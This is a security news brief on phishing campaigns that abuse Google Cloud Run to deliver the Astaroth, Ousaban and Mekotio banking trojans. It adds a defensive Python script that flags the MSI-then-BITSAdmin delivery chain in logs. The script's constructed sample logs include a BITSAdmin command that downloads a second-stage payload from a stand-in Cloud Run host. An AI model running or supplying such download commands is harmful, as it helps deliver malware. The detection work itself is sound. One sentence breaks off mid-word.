Cloud Security

High-volume malware campaigns involve Google Cloud Run exploitation

BleepingComputer reports that several countries across Latin America have been subjected since September to high-volume campaigns deploying the Astaroth, Ousaban, and Mekotio banking trojans. The campaigns abuse the legitimate Google Cloud Run service as a delivery layer rather than exploiting a flaw in it: the phishing links point at Cloud Run-hosted resources that lead victims to the malicious installers.

According to the Cisco Talos report, intrusions begin with phishing emails that use financial and tax documents, as well as local government communications, as lures; the emails contain links to Google Cloud Run. The attackers deliver the initial payload as MSI installer files and then abuse the legitimate Windows BITSAdmin tool to download the second-stage payload. Analysis of the delivered trojans found that Astaroth, also known as Guildma, has already targeted more than 300 financial organizations. Beyond keylogging and clipboard monitoring, Astaroth also exfiltrates cryptocurrency wallet and banking credentials. Ousaban, which is delivered in the later stages of Astaroth infections, phishes for credentials via fraudulent banking p… Mekotio, meanwhile, manipulates the browser in addition to stealing banking credentials and personal data.
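The chain above (a link to a Cloud Run host, an MSI download, then a BITSAdmin transfer for the second stage) is easy to hunt for in proxy and process-creation telemetry. The script below is an added example written for this page, not code from Talos, BleepingComputer or SC Media; the key=value log format, the field names, the sample hostnames and the 30-minute correlation window are all assumptions, and the log lines are constructed for the example.

```python
"""Triage constructed proxy/endpoint log lines for the delivery chain described
above: an MSI fetched from a Google Cloud Run (*.run.app) host, followed by a
BITSAdmin /transfer pulling a second stage.  Example code added for this page;
the log schema and sample values are assumptions, not real telemetry."""
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

CLOUD_RUN_SUFFIX = ".run.app"      # default hostname suffix for Cloud Run services
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')   # key=value or key="quoted value"
URL_RE = re.compile(r"https?://\S+")

# Constructed sample lines (assumed key=value format; not a real product's schema).
SAMPLE_LOGS = r"""
ts=2024-02-20T10:01:02Z type=proxy user=alice host=update-5k2q3.a.run.app path=/doc.msi ctype=application/x-msi
ts=2024-02-20T10:01:09Z type=process user=alice image=C:\Windows\System32\msiexec.exe cmdline="msiexec.exe /i C:\Users\alice\Downloads\doc.msi /qn"
ts=2024-02-20T10:01:15Z type=process user=alice image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin /transfer job /download /priority high https://stage2-7fh1a.a.run.app/p.bin C:\ProgramData\p.bin"
ts=2024-02-20T10:02:00Z type=proxy user=bob host=www.example.com path=/index.html ctype=text/html
ts=2024-02-20T10:02:30Z type=process user=bob image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin /list"
"""


def parse_line(line):
    """Turn one key=value line into a dict; quoted values may contain spaces."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def is_cloud_run(host):
    return host.lower().endswith(CLOUD_RUN_SUFFIX)


def triage(log_text):
    """Return (timestamp, user, rule, detail) tuples for lines matching a rule."""
    findings = []
    for raw in log_text.strip().splitlines():
        rec = parse_line(raw)
        ts = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        user = rec.get("user", "?")
        if rec.get("type") == "proxy":
            # Rule 1: MSI installer served from a Cloud Run hostname.
            host, path = rec.get("host", ""), rec.get("path", "")
            if is_cloud_run(host) and (path.lower().endswith(".msi")
                                       or rec.get("ctype") == "application/x-msi"):
                findings.append((ts, user, "msi_from_cloud_run", host + path))
        elif rec.get("type") == "process":
            # Rule 2: BITSAdmin used to download something; escalate when the
            # URL also points at Cloud Run.  "bitsadmin /list" does not match.
            image, cmd = rec.get("image", "").lower(), rec.get("cmdline", "")
            if image.endswith("bitsadmin.exe") and "/transfer" in cmd.lower():
                urls = URL_RE.findall(cmd)
                hosts = [urlparse(u).hostname or "" for u in urls]
                rule = ("bitsadmin_transfer_cloud_run" if any(map(is_cloud_run, hosts))
                        else "bitsadmin_transfer")
                findings.append((ts, user, rule, ", ".join(urls)))
    return findings


def chained_users(findings, window=timedelta(minutes=30)):
    """Users for whom a Cloud Run MSI fetch is followed by a BITSAdmin transfer
    within `window`: the full delivery chain rather than one isolated event."""
    by_user = {}
    for ts, user, rule, _ in findings:
        by_user.setdefault(user, []).append((ts, rule))
    suspects = set()
    for user, events in by_user.items():
        msi_times = [t for t, r in events if r == "msi_from_cloud_run"]
        bits_times = [t for t, r in events if r.startswith("bitsadmin_transfer")]
        if any(timedelta(0) <= b - m <= window for m in msi_times for b in bits_times):
            suspects.add(user)
    return suspects


if __name__ == "__main__":
    hits = triage(SAMPLE_LOGS)
    for hit in hits:
        print(hit)
    print("full-chain suspects:", chained_users(hits))
```

The two single-event rules are noisy on their own (BITSAdmin has legitimate administrative uses, and Cloud Run hosts plenty of benign services), which is why the example correlates them per user inside a time window before raising a suspect; tune the window and the hostname suffix to your environment.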
